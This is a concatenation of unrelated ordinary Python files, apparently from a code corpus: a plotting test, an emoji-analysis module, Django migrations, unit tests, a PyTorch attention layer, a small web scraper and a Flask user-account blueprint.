pl.title("clt Interp")
fig = pl.figure(1)
fig.add_subplot(2,2,2)
self.cmap.pcolor(self.tas.getLongitude()[:], self.tas.getLatitude()[:],
cltIntCyc, vmin = 0, vmax = 100)
self.cmap.colorbar()
self.cmap.drawcoastlines()
pl.title("clt Interp Cyclic")
fig.add_subplot(2,2,3)
self.tmap.pcolor(self.clt.getLongitude()[:], self.clt.getLatitude()[:],
tasInterp, vmin = 250, vmax = 300)
self.tmap.colorbar()
self.tmap.drawcoastlines()
pl.title("tas Interp")
fig.add_subplot(2,2,4)
self.tmap.pcolor(self.clt.getLongitude()[:], self.clt.getLatitude()[:],
tasIntCyc, vmin = 250, vmax = 300)
self.tmap.colorbar()
self.tmap.drawcoastlines()
pl.title("tas Interp Cyclic")
if __name__ == '__main__':
print "" # Spacer
suite = unittest.TestLoader().loadTestsFromTestCase(TestTasRegrid)
unittest.TextTestRunner(verbosity = 1).run(suite)
if PLOT: pl.show()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# EVAPOR Workflow written in Python 3.6 in April 2020 by mswartz2@gmu.edu
# This code will import text string, extract the emojis as list
# report out the unique emojis and unique emoji attributes for the text
# then for text analyze the structure of the content
# and then delve into the emojis and report out the relative position,
# and then report out on the emoji vector of attributes, position, order, repetition of emoji use within the text
# text, emoji_list, unique emojis and attributes, relative position of emoji,
# per span of emojis/attributes flipped or not, repetition within single, repetition across
# dependencies
import json
import re # if re not on system do pip install re
import regex
import ast
# included in this repo
import extractEmojis
import getEmojiAttributes
#import identifyStructure
# get the emoji spans as attributes
def getAttributesForSpansList(list_of_lists_of_vals, attribute):
attributes_to_choose_from = ['rownum', 'emoji', 'cldr short name', 'codepoint', 'status' , 'char_len', 'version', \
'desc', 'person_animal_other', 'anthro_type','gender', 'skin_tone', 'sentiment_smileys_binary',\
'shape_type', 'shape_color', 'direction','group', 'subgroup', 'grp_subgrp']
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
if attribute in attributes_to_choose_from:
attribute_spans_list = []
for sublist in list_of_lists_of_vals:
attribute_sublist = getEmojiAttributes.getListOfSingleAttributeValuesForEmojiList(sublist, attribute)
attribute_spans_list.append(attribute_sublist)
return attribute_spans_list
else:
return []
else:
return []
# get the relative position
## ANALYZE EMOJI SPANS
## GET RELATIVE POSITION
# sample text: RT @atmention: @person2 12 🗳🇦🇺😃 yes ll smiles #yes #happiness @my_day 🟠🍎http://www.happiness.wwwwww
# GET RELATIVE POSITION
content_type_of_interest = 'emoji'
def getRelativePositionOfContentType(fullDocumentStructureWithContent, content_type_of_interest):
# input: fullDocumentStructureWithContent = [('RT', 1, ['RT']), ('at_mention', 2, ['@atmention', '@person2']), ('text', 2, ['12', ' ']), ('emoji', 3, ['🗳', '🇦🇺', '😃']), ('text', 6, ['yes', ' ', 'll', ' ', 'smiles', ' ']), ('hashtag', 2, ['#yes', '#happiness']), ('at_mention', 1, ['@my_day']), ('emoji', 2, ['\U0001f7e0', '🍎']), ('url', 1, ['http://www.happiness.wwwwww'])]
# code: emoji_positions = get_index_pos_list_relative(fullDocumentStructureWithContent, 'emoji')
# output: ['middle', 'end']
# outputs are beginning, middle, end # these are relative but can use the strucuture list for more details
# NOTES: can also put in 'at_mention' or 'url' etc to see where they are
span_list = []
if content_type_of_interest not in ['RT','at_mention','emoji','url','text','punctuation']:
return []
if type(fullDocumentStructureWithContent) != list:
new_fullDocumentStructureWithContent = ast.literal_eval(fullDocumentStructureWithContent)
if (len(new_fullDocumentStructureWithContent)>0) and (type(new_fullDocumentStructureWithContent[0])==tuple):
span_list = new_fullDocumentStructureWithContent
else:
return []
else:
span_list = fullDocumentStructureWithContent
try:
index_span_pos_list = [ i for i in range(len(span_list)) if span_list[i][0] == content_type_of_interest]
pos_list = []
num_spans = len(span_list)
structure_cnts = [0,0,0,0,0]# span counts
relative_pos_list = [0,0,0,0,0]
relative_pos_list_descrip = []
cnt_spans = 0
index_span_pos_list_relative = [[],[],[],[],[]]
pos_list_w_values = [[],[],[],[],[]]
pos_list_w_value_cnts = [[],[],[],[],[]]
pos_list_w_total = [0,0,0,0,0]
if 0 in index_span_pos_list:
relative_pos_list_descrip.append('start')
structure_cnts[0]=1
relative_pos_list[0]=1
pos_list_w_values[0]=[tuple(span_list[0][2])]
pos_list_w_value_cnts[0] = [span_list[0][1]]
pos_list_w_total[0] = span_list[0][1]
index_span_pos_list_relative[0]= [0]
if num_spans > 1:
if len(span_list)-1 in index_span_pos_list:
relative_pos_list_descrip.append('final')
structure_cnts[4]=1
relative_pos_list[4]=1
pos_list_w_values[4]=[tuple(span_list[-1][2])]
pos_list_w_value_cnts[4] = [span_list[-1][1]]
pos_list_w_total[4] = span_list[-1][1]
index_span_pos_list_relative[4]= [len(span_list)-1]
if num_spans == 3:
# middle = 1
if 1 in index_span_pos_list:
relative_pos_list_descrip.append('middle')
relative_pos_list[2]=1
structure_cnts[2] = 1# mid
pos_list_w_values[2]=[tuple(span_list[1][2])]
pos_list_w_value_cnts[2] = [span_list[1][1]]
pos_list_w_total[2] = span_list[1][1]
index_span_pos_list_relative[2]= [1]
if num_spans == 4 : # 4 has no middle
if 1 in index_span_pos_list:
relative_pos_list_descrip.append('beginning')
relative_pos_list[1]=1
structure_cnts[1] = 1#
pos_list_w_values[1]=[tuple(span_list[1][2])]
pos_list_w_value_cnts[1] = [span_list[1][1]]
pos_list_w_total[1] = span_list[1][1]
index_span_pos_list_relative[1]= [1]
if 2 in index_span_pos_list:
relative_pos_list_descrip.append('end')
relative_pos_list[3]=1
structure_cnts[3] = 1#
pos_list_w_values[3]=[tuple(span_list[2][2])]
pos_list_w_value_cnts[3] = [span_list[2][1]]
pos_list_w_total[3] = span_list[2][1]
index_span_pos_list_relative[3]= [2]
if num_spans == 5 :# if 5 if has a middle if a 3
if 1 in index_span_pos_list:
relative_pos_list_descrip.append('beginning')
relative_pos_list[1]=1
structure_cnts[1] = 1#
pos_list_w_values[1]=[tuple(span_list[1][2])]
pos_list_w_value_cnts[1] = [span_list[1][1]]
pos_list_w_total[1] = span_list[1][1]
index_span_pos_list_relative[1]= [1]
if 2 in index_span_pos_list:
relative_pos_list_descrip.append('middle')
relative_pos_list[2]=1
structure_cnts[2] = 1# mid
#print('middle small cnt = ', structure_cnts[2])
pos_list_w_values[2]=[tuple(span_list[2][2])]
pos_list_w_value_cnts[2] = [span_list[2][1]]
pos_list_w_total[2] = span_list[2][1]
index_span_pos_list_relative[2]= [2]
if 3 in index_span_pos_list:
relative_pos_list_descrip.append('end')
relative_pos_list[3]=1
structure_cnts[3] = 1#
pos_list_w_values[3]=[tuple(span_list[3][2])]
pos_list_w_value_cnts[3] = [span_list[3][1]]
pos_list_w_total[3] = span_list[3][1]
index_span_pos_list_relative[3]= [3]
# if 5 or more then add in beggining or end and based on size of span list
if num_spans > 5:
third = int(num_spans/3)
beginning_indices = [i for i in range(third)]
end_indices = [num_spans - beginning_indices[v] for v in reversed(beginning_indices)]
#middle_indices = [i for i in range(beginning_indices[-1]+1,end_indices[0])]
middle_indices = [i for i in range(beginning_indices[-1]+1,end_indices[0]-1)]
end_indices = [end_indices[0]-1] + end_indices # for handling even numbers
def intersection_list(lst1, lst2):
lst3 = [value for value in lst1 if value in lst2]
return lst3
# indices w values of interest
beg_indices_w_val_of_interest = intersection_list(index_span_pos_list,beginning_indices)# beg
mid_indices_w_val_of_interest = intersection_list(index_span_pos_list,middle_indices)# mid
end_indices_w_val_of_interest = intersection_list(index_span_pos_list,end_indices)# end
# so no dupes with first and last if they exist
if 0 in index_span_pos_list:
beg_indices_w_val_of_interest = beg_indices_w_val_of_interest[1:]
if len(span_list)-1 in index_span_pos_list:
end_indices_w_val_of_interest = end_indices_w_val_of_interest[:-1]
# append counts
structure_cnts[1] = len(beg_indices_w_val_of_interest)# beg
structure_cnts[2] = len(mid_indices_w_val_of_interest)# mid
structure_cnts[3] = len(end_indices_w_val_of_interest)# end
if structure_cnts[1]>0:
relative_pos_list_descrip.append('beginning')
relative_pos_list[1]=1
pos_list_w_values[1]=[tuple(span_list[i][2]) for i in beg_indices_w_val_of_interest]
pos_list_w_value_cnts[1] = [span_list[i][1] for i in beg_indices_w_val_of_interest]
pos_list_w_total[1] = sum([span_list[i][1] for i in beg_indices_w_val_of_interest])
index_span_pos_list_relative[1]= beg_indices_w_val_of_interest
if structure_cnts[2]>0:
relative_pos_list_descrip.append('middle')
relative_pos_list[2]=1
pos_list_w_values[2]=[tuple(span_list[i][2]) for i in mid_indices_w_val_of_interest]
pos_list_w_value_cnts[2] = [span_list[i][1] for i in mid_indices_w_val_of_interest]
pos_list_w_total[2] = sum([span_list[i][1] for i in mid_indices_w_val_of_interest])
index_span_pos_list_relative[2]= mid_indices_w_val_of_interest
if structure_cnts[3]>0:
relative_pos_list_descrip.append('end')
relative_pos_list[3]=1
pos_list_w_values[3]=[tuple(span_list[i][2]) for i in end_indices_w_val_of_interest]
pos_list_w_value_cnts[3] = [span_list[i][1] for i in end_indices_w_val_of_interest]
pos_list_w_total[3] = sum([span_list[i][1] for i in end_indices_w_val_of_interest])
index_span_pos_list_relative[3]= end_indices_w_val_of_interest
cnt_spans = len(index_span_pos_list)
#return [cnt_spans, index_span_pos_list, index_span_pos_list_relative,\
# relative_pos_list,relative_pos_list_descrip, structure_cnts,\
# pos_list_w_values, pos_list_w_value_cnts, pos_list_w_total]
# move final to the end
if 'final' in relative_pos_list_descrip:
relative_pos_list_descrip.remove('final')
relative_pos_list_descrip +=['final']
return relative_pos_list_descrip
except:
return []
# get the order
# get the repetition
## ANALYZE REPETITION WITHIN SPAN
# check for repetition within each span
def labelRepetitionWithinSpans(list_of_vals_in_spans):
# input: emojis_as_list_in_spans_list = [['💙️'],['💙️','💙️','💙️'],['😃']]
# code: within_span_repetition_list = check_for_repetition_within_each_span_per_attribute(emojis_as_list_in_spans_list)
# output: ['single_within','all_identical_within','single_within']
repetition_within_spans_status_list = []
if list_of_vals_in_spans == []:
return repetition_within_spans_status_list
for val_span_list in list_of_vals_in_spans:
if len(val_span_list) == 1:
repetition_within_spans_status_list.append('single_within')
else: # more than one val
val_set = set(val_span_list)
if len(val_set) == 1:
repetition_within_spans_status_list.append('all_identical_within') # amplification
elif len(val_set) < len(val_span_list):# some repetition
repetition_within_spans_status_list.append('some_identical_within') # list which are identical?
else:# if len(val_set) = len(val_span_list) # no repetition all unique
repetition_within_spans_status_list.append('no_repetition_within')
return repetition_within_spans_status_list
def getValuesRepeatedWithinSpans(list_of_lists_of_vals):
# input: emojis_as_list_in_spans_list = [['💙️'],['💙️','💙️','💙️'],['😃']]
# code: vals_repeated_within_span = getValuesRepeatedWithinSpans(emojis_as_list_in_spans_list)
# value repeated, span number, number of times repeated
# output: [('💙️',1,3)]
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_w_vals_repeated_within = []
i=0
for span in list_of_lists_of_vals:
if len(span)>1:
uniques_in_span = list(set(span))
if len(uniques_in_span) != len(span):
for uni in uniques_in_span:
cnt = span.count(uni)
if cnt >1:
tup = (uni,i,span.count(uni))
list_w_vals_repeated_within.append(tup)
i+=1
return list_w_vals_repeated_within
else:
return []
## ANALYZE REPETITION ACROSS SPANS
# function to get cnt of spans value found in
def getCntSpansPerValue(list_of_lists_of_vals):
# input: emojis_as_list_in_spans_list = [['💙️'],['💙️','💙️','💙️'],['😃']]
# code: list_of_vals_w_cnts_of_span = get_cnt_of_lists_in_list_per_val(emojis_as_list_in_spans_list)
# output: [('💙️',2),('😃',1)]
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_of_val_cnt_tuples = []
long_list_on_uni_vals_per_list = []
if list_of_lists_of_vals == []:
return list_of_val_cnt_tuples
# make sure it is a list of list of uniques
list_of_unique_vals_in_list = [sorted(list(set(list_of_vals))) for list_of_vals in list_of_lists_of_vals]
# convert list of lists to long list
for uni_vals in list_of_unique_vals_in_list:
long_list_on_uni_vals_per_list += uni_vals
# get unique emojis
uni_vals_list = list(set(long_list_on_uni_vals_per_list))
for uni_val in uni_vals_list:
if long_list_on_uni_vals_per_list.count(uni_val)>1:
list_of_val_cnt_tuples.append((uni_val, long_list_on_uni_vals_per_list.count(uni_val)))
# for consistency and comparison sorting list of cnts by val ascending then by cnt descending
# sort the list of val cnts in acending order by emoji (first item in tuple)
descending_sort_list_of_cnts_by_val = sorted(list_of_val_cnt_tuples, key = lambda x: x[0])
# sort the list of val cnts in descending order by cnt (second item in tuple)
descending_sort_list_of_cnts = sorted(descending_sort_list_of_cnts_by_val, key = lambda x: x[1], reverse=True)
return descending_sort_list_of_cnts
else:
return []
# STATUS OF REPETITION ACROSS SPANS
# check if any spans are in common
def getLabelForRepetitionAcrossSpans(list_of_lists_of_vals):
# e.g. input: [['💙️', '🙏','😀','🔴'], ['💙️', '🙏'], ['💙️','🟢'], ['😀']] ==> output: 'no_repetition_of_list_of_vals'
# input: list_of_emojis_in_spans = [['💙️', '🙏'], ['💙️', '🙏'], ['💙️'], ['😀']]
# code: repetition_status_across_spans = check_repetition_of_list_vals_across_list_of_lists(list_of_emojis_in_spans)
# output: 'some_repetition_of_list_vals'
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
if list_of_lists_of_vals == []:
return []
list_of_uni_val_lists_as_strs = []
for val_list in list_of_lists_of_vals:
list_of_uni_val_lists_as_strs.append(str(val_list))
if len(list_of_lists_of_vals) == 1:
return "single_list"
elif len(list_of_lists_of_vals)>1 and len(set(list_of_uni_val_lists_as_strs))==1:
return "repetition_across_spans"
elif len(list_of_lists_of_vals)>1 and (len(list_of_lists_of_vals) == len(set(list_of_uni_val_lists_as_strs))):
return "no_repetition_across_spans"
elif len(list_of_lists_of_vals)>1 and len(set(list_of_uni_val_lists_as_strs))>1:
return "some_repetition_across_spans"
else:
return "unknown"
else:
return "no_repetition_across_spans"
# VALUES THAT ARE REPETITION ACROSS SPANS AND ORDER
# get the spans that are in common with other span parts (repetition with same order)
def getSpansInOtherSpansPlusCount(list_of_lists_of_vals):
# input: list_of_emojis_in_spans = [['💙️', '🙏'], ['💙️', '🙏','🔴'], ['💙️'], ['😀']]
# code: list_of_vals_in_common = get_list_of_vals_that_are_in_other_lists(list_of_emojis_in_spans)
# output: [("'💙️'", 3), ("'💙️', '🙏'", 2)]
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_of_lists_of_vals_as_strs = [str(val_list) for val_list in list_of_lists_of_vals]
list_of_tuple_cnts_of_spans_in_other_spans = []
for i in range(len(list_of_lists_of_vals)):
val_list_as_str_to_check = list_of_lists_of_vals_as_strs[i][1:-1]
cnt_how_many_times_val_list_in_other_lists = 1
for z in range(len(list_of_lists_of_vals_as_strs)):
if i == z:
continue
else:
val_list_str = list_of_lists_of_vals_as_strs[z]
if val_list_as_str_to_check in val_list_str:
#print('true', val_list_as_str_to_check, val_list_str)
cnt_how_many_times_val_list_in_other_lists += 1
list_of_tuple_cnts_of_spans_in_other_spans.append((val_list_as_str_to_check.replace("'","").replace(', ','').replace('"',''),cnt_how_many_times_val_list_in_other_lists))
uni_tup_cnts_list = list(set(list_of_tuple_cnts_of_spans_in_other_spans))
uni_tup_cnts_list_greater_than_1 = filter(lambda x: x[1] > 1, uni_tup_cnts_list)
return sorted(uni_tup_cnts_list_greater_than_1, key = lambda x: x[1], reverse=True)
else:
return []
## ANALYZE ORDER AND SYMMETRY ACROSS SPANS CHECK FOR IDENTICAL OR FLIPPED
#import ast
# check the spans that are identical uniques for flipped order
def checkIdenticalOrFlippedSpans(list_of_lists_of_vals):
# input: list_of_emojis_in_spans = [['💙️','🙏'], ['🙏','💙️'], ['💙️','🙏'], ['😀'],['😀']]
# code: symmetry_check = check_for_symmetrical_patterns_across_lists(list_of_emojis_in_spans)
# output: [('identical_spans', ([0, 2], ['💙️', '🙏'])),
#('identical_spans', ([3, 4], ['😀'])),
#('flipped_spans', ([0, 2], [1], [['💙️', '🙏'], ['🙏', '💙️']]))]
# NOTES
# the numbers indicate the index position of the span in the input list
# for flipped, spans at [0,2] both have the value ['💙️', '🙏']
# and the span at position [1] contains the flipped version which is ['🙏', '💙️']
if type(list_of_lists_of_vals)==float or list_of_lists_of_vals == [] or list_of_lists_of_vals == "[]" or list_of_lists_of_vals == '':
return []
elif type(list_of_lists_of_vals) != list:
list_of_lists_of_vals = ast.literal_eval(list_of_lists_of_vals)
if type(list_of_lists_of_vals)==list and type(list_of_lists_of_vals[0])==list:
list_of_lists_of_vals_as_strs = [str(val_list) for val_list in list_of_lists_of_vals]
uni_list_of_val_lists_as_strs = list(set(list_of_lists_of_vals_as_strs))
list_of_tuple_symmetry_spans = []
list_of_identical_spans = []
list_of_flipped_spans = []
for uni_val_list_str in uni_list_of_val_lists_as_strs:
flipped_val_list_as_str_to_check = str(list(reversed(ast.literal_eval(uni_val_list_str))))
val_list_w_identicals = []
val_list_w_flipped = []
for z in range(len(list_of_lists_of_vals_as_strs)):
val_list_str_to_compare = list_of_lists_of_vals_as_strs[z]
if uni_val_list_str == val_list_str_to_compare:
val_list_w_identicals.append(z)
if uni_val_list_str.count(',')> 0: # if more than one val then check for flipped
if flipped_val_list_as_str_to_check == val_list_str_to_compare:
val_list_w_flipped.append(z)
if len(val_list_w_identicals) > 1:
list_of_tuple_symmetry_spans.append(('identical_spans', (val_list_w_identicals, list_of_lists_of_vals[val_list_w_identicals[0]])))
if len(val_list_w_flipped) > 0:
if min(val_list_w_identicals) < min(val_list_w_flipped):
list_of_tuple_symmetry_spans.append(('flipped_spans', (val_list_w_identicals, val_list_w_flipped, [list_of_lists_of_vals[val_list_w_identicals[0]],list_of_lists_of_vals[val_list_w_flipped[0]]])))
# for flipped spans if the second is smaller than first then drop
if list_of_tuple_symmetry_spans == []:
return [('no_identical_or_flipped_spans',)]
return sorted(list_of_tuple_symmetry_spans, key = lambda x: x[0], reverse=True)
else:
return []
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.13 on 2021-08-09 08:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0118_auto_20210809_1032'),
]
operations = [
migrations.AlterField(
model_name='reportcolumnpostfix',
name='phases',
field=models.ManyToManyField(related_name='report_columns', to='projects.CommonProjectPhase', verbose_name='phases'),
),
]
|
nilq/baby-python
|
python
|
"""
Serialiser tests
"""
from datetime import datetime
import unittest
from zorp.serialiser import Serialiser
class TestSerialiser(unittest.TestCase):
"""
Test the serialiser
"""
def __test_encode_decode(self, expected):
"""
Test that encoding and decoding a value
results in the original value
"""
actual = Serialiser.decode(Serialiser.encode(expected))
self.assertEqual(expected, actual)
def test_string(self):
"""
Test encoding/decoding a string
"""
self.__test_encode_decode("This is a string")
def test_datetime(self):
"""
Test encoding/decoding a datetime
"""
self.__test_encode_decode(datetime(1970, 1, 2))
def test_empty_list(self):
"""
Test encoding/decoding an empty list
"""
self.__test_encode_decode([])
def test_list(self):
"""
Test encoding/decoding a list
"""
self.__test_encode_decode([1, "two"])
def test_empty_dict(self):
"""
Test encoding/decoding an empty dict
"""
self.__test_encode_decode({})
def test_dict(self):
"""
Test encoding/decoding a list
"""
self.__test_encode_decode({"one": 1, "two": 2})
|
nilq/baby-python
|
python
|
import torch
import torch.utils.data as data_utils
from torch.utils.data import DataLoader
import torch.autograd as autograd
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.parameter import Parameter
from allennlp.modules.attention import BilinearAttention, DotProductAttention
from allennlp.nn.util import weighted_sum
from allennlp.nn.util import masked_softmax
from allennlp.modules import FeedForward
import logging
import numpy as np
import joblib
import os
from layers.activation import get_activation
class Attention(nn.Module):
'''
Single-task attention
'''
def __init__(self, input_dim, dropout=0.0, use_ffnn=True, query_dim=None,
activation='tanh'):
super(Attention, self).__init__()
self.use_ffnn = use_ffnn
if self.use_ffnn:
self.ffnn = FeedForward( \
input_dim = input_dim,
num_layers = 1,
hidden_dims = query_dim,
activations = get_activation(activation),
dropout = 0)
else:
query_dim = input_dim
# Dot product attention
self.attention = DotProductAttention(normalize=True)
# Event-specific attention vector
# (input_dim)
self.vector = Parameter(torch.Tensor(query_dim))
torch.nn.init.normal_(self.vector)
# Dropout
self.drop_layer = nn.Dropout(p=dropout)
def forward(self, X, mask=None, verbose=False):
'''
Generate predictions
Parameters
----------
X: input with shape (batch_size, max_seq_len, input_dim)
mask: input with shape (batch_size, max_seq_len)
'''
# Batch size
batch_size = X.shape[0]
# Batch vector (repeat across first dimension)
vector = self.vector.unsqueeze(0).repeat(batch_size, 1)
#
if self.use_ffnn:
Q = self.ffnn(X)
else:
Q = X
# Attention weights
# shape: (batch_size, max_seq_len)
alphas = self.attention( \
vector = vector,
matrix = Q,
matrix_mask = mask)
# Attended input
# shape: (batch_size, encoder_query_dim)
output = weighted_sum(X, alphas)
# Dropout layer
output = self.drop_layer(output)
if verbose:
logging.info('Attention')
logging.info('\tinput_dim: {}'.format(input_dim))
logging.info('\tquery_dim: {}'.format(query_dim))
logging.info('\tactivation: {}'.format(activation))
logging.info('\tdropout: {}'.format(dropout))
logging.info('\tuse_ffnn: {}'.format(use_ffnn))
return (output, alphas)
|
nilq/baby-python
|
python
|
from oscar.apps.offer import models
class AlphabetRange(object):
name = "Products that start with D"
def contains_product(self, product):
return product.title.startswith('D')
def num_products(self):
return None
class BasketOwnerCalledBarry(models.Condition):
name = "User must be called barry"
class Meta:
proxy = True
def is_satisfied(self, basket):
if not basket.owner:
return False
return basket.owner.first_name.lower() == 'barry'
def can_apply_condition(self, product):
return False
def consume_items(self, basket, affected_lines):
return
|
nilq/baby-python
|
python
|
# Generated by Django 2.1.7 on 2019-04-09 14:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('home', '0044_auto_20190409_1448'),
]
operations = [
migrations.RemoveField(
model_name='badgespage',
name='genericpage_ptr',
),
migrations.AddField(
model_name='badgespage',
name='resourcepage_ptr',
field=models.OneToOneField(auto_created=True, default=None, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='home.ResourcePage'),
preserve_default=False,
),
]
|
nilq/baby-python
|
python
|
import requests
from bs4 import BeautifulSoup
blacklist = {
"farms",
"csa",
"farmers-markets",
"restaurants",
"food-coops",
"u-pick",
"farm-stands",
"others",
"list"}
city = '/locations/'
wiki = f"https://www.localharvest.org/{city}"
page = requests.get(wiki)
soup = BeautifulSoup(page.text, "html.parser")
for link in soup.find_all('a'):
href = link.get('href')
if href[:len(city)] == city and href[len(city):] not in blacklist:
print(href[len(city):])
|
nilq/baby-python
|
python
|
"""Common functions."""
import re
from socket import getaddrinfo, AF_INET, AF_INET6, IPPROTO_TCP
from datetime import timedelta
def explode_datetime(datetime_str):
"""Extract days minutes and seconds from datetime (days, minutes, seconds).
Example: "1d 3h 2m" returns {"days": "1", "hours": "3", "minutes": "2"}
Keyword arguments:
datetime_str -- date time in string
"""
base_regex = ".*([0-9]){pattern}.*"
def extract_timeunit(pattern):
try:
result = int(re.match(base_regex.format(pattern=pattern), datetime_str)[1])
except (ValueError, TypeError):
result = 0
return result
days = extract_timeunit("d")
hours = extract_timeunit("h")
minutes = extract_timeunit("m")
return timedelta(days=days, hours=hours, minutes=minutes)
def resolve_hostname(hostname, address_family):
"""Convert hostname to IP.
Keyword arguments:
hostname -- hostname to resolve
address_family -- preferred address family for resolution
"""
af_string_to_attribute = {"ipv4": AF_INET, "ipv6": AF_INET6}
try:
family = af_string_to_attribute[address_family]
except KeyError:
raise ValueError("unknown address family")
try:
ip_addr = getaddrinfo(hostname, None, family=family, proto=IPPROTO_TCP)[0][4][0]
return ip_addr
except Exception:
return
|
nilq/baby-python
|
python
|
from flask import Blueprint, request, render_template, flash, g, session, redirect, url_for, current_app, json
from flask.ext.login import login_user, login_required, logout_user
from app.users.models import Users
from app.users.forms import LoginForm, RegisterForm, UserForm, PasswordForm, ResetPassForm, NewPassForm
from app.users.decorators import admin_required
from app.services.mail import send_email
from app.services.ajax import getnewmessages
import datetime
mod = Blueprint('users',__name__)
@mod.before_app_request
def load_session_data():
if 'user_id' in session.keys():
g.user = Users.objects(id=session['user_id']).get()
session.inbox = getnewmessages(g.user.id)
@mod.before_request
def load_menu_data():
session.activemenu = 'Membri'
@mod.route('/login', methods=['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
try:
user = Users.objects(email=form.email.data).get()
if user.verify_password(form.password.data):
login_user(user,form.remember_me.data)
return redirect(request.args.get('next') or url_for('wall.list'))
else:
raise Exception('Not authorised')
except Exception as err:
flash('Invalid username or password!', category='alert-danger')
return render_template('users/login.html', pagetitle='Login',form=form,login=True)
@mod.route('/logout', methods=['GET'])
def logout():
logout_user()
return redirect('/login')
@mod.route('/inregistrare', methods=['GET','POST'])
def registeruser():
""" Build the view used to add new accounts """
form = RegisterForm()
if form.validate_on_submit():
try:
user = Users(username=form.username.data,email=form.email.data,specialties=form.specialties.data.split(','),interests=form.interests.data.split(','))
user.password = form.password.data
user.save()
token = user.generate_confirmation_token()
send_email(user.email,'Confirmare email','users/email/confirm',user=user,token=token)
flash('Contul a fost adaugat! Va rugam confirmati adresa de email!', category='alert-success')
except Exception as err:
flash('Contul nu poate fi creat!', category='alert-warning')
return redirect(url_for('users.login'))
return render_template('users/login.html',pagetitle='Inregistrare',form=form,login=False)
@mod.route('/reseteazaparola/', methods=['GET','POST'])
def resetlink():
form = ResetPassForm()
if form.validate_on_submit():
try:
user = Users.objects(email=form.email.data).get()
token = user.generate_reset_token()
send_email(user.email,'Resetare parola','/users/email/passwdreset',user=user,token=token)
flash('Parola a fost resetata! Va rugam urmati instructiunile primite pe email!',category='alert-success')
return redirect(request.referrer)
except Exception as err:
flash('Adresa de email nu exista!',category='alert-danger')
return redirect(request.referrer)
return render_template('users/login.html',pagetitle='Resetare parola',form=form,login=False)
@mod.route('/reseteaza/<email>/<token>', methods=['GET','POST'])
def resetpassword(email,token):
form = NewPassForm()
if form.validate_on_submit():
try:
user = Users.objects(email=email).get()
if user.id == user.resetpass(token):
user.password = form.password.data
user.save()
flash('Parola schimbata!',category='alert-success')
return redirect(url_for('users.login'))
else:
raise Exception
except:
flash('Token invalid!',category='alert-danger')
return redirect(url_for('users.resetlink'))
return render_template('users/login.html',pagetitle='Resetare parola',form=form,login=False)
@mod.route('/confirmaemail/<token>')
@login_required
def confirmemail(token):
if g.user.mail_confirmed:
return redirect(request.args.get('next') or url_for('users.edituser'))
if g.user.confirm(token):
flash('Adresa de email confirmata!',category='alert-success')
else:
flash('Token expirat sau invalid!',category='alert-danger')
return redirect(request.args.get('next') or url_for('users.edituser'))
@mod.route('/lista')
@login_required
def list():
""" Build the view used to list all existing accounts """
results = [x for x in Users.objects()]
return render_template('users/list.html',results=results)
@mod.route('/adauga', methods=['GET','POST'])
@admin_required
@login_required
def adduser():
""" Build the view used to add new accounts """
form = RegisterForm()
if form.validate_on_submit():
try:
user = Users(username=form.username.data,email=form.email.data,specialties=form.specialties.data.split(','),interests=form.interests.data.split(','))
user.password = form.password.data
user.save()
token = user.generate_confirmation_token()
send_email(user.email,'Confirmare email','users/email/confirm',user=user,token=token)
flash('Contul a fost adaugat!', category='alert-success')
except Exception as err:
flash('Utilizatorul are deja cont!', category='alert-warning')
return redirect(url_for('users.list'))
return render_template('users/add.html',pagetitle='Adauga utilizator',form=form)
@mod.route('/editeaza/', methods=['GET','POST'])
@login_required
def edituser():
""" Build the view used to edit existing accounts """
user = Users.objects(id=unicode(g.user.id)).get()
form = UserForm()
if form.validate_on_submit():
user.username = form.username.data
if form.avatar.data:
image_data = request.FILES[form.avatar.name].read()
user.avatar = image_data
user.email = form.email.data
user.specialties = form.specialties.data.split(',')
user.interests = form.interests.data.split(',')
user.save()
flash('Cont modificat!',category='alert-success')
return redirect(request.referrer)
form.username.data = user.username
form.email.data = user.email
form.avatar.data = ''
form.specialties.data = ','.join(user.specialties)
form.interests.data = ','.join(user.interests)
return render_template('users/add.html',pagetitle='Editeaza utilizator',form=form)
@mod.route('/editeazaparola/', methods=['GET','POST'])
@login_required
def editpswduser():
""" Build the view used to edit a password for an existing account """
user = Users.objects(id=unicode(g.user.id)).get()
form = PasswordForm()
if form.validate_on_submit() and user.verify_password(form.oldpasswd.data):
user.password = form.password.data
user.save()
flash('Parola modificata!', category='alert-success')
return redirect(request.referrer)
return render_template('users/add.html',pagetitle='Editeaza parola',form=form)
@mod.route('/detalii/<id>')
@login_required
def detailuser(id):
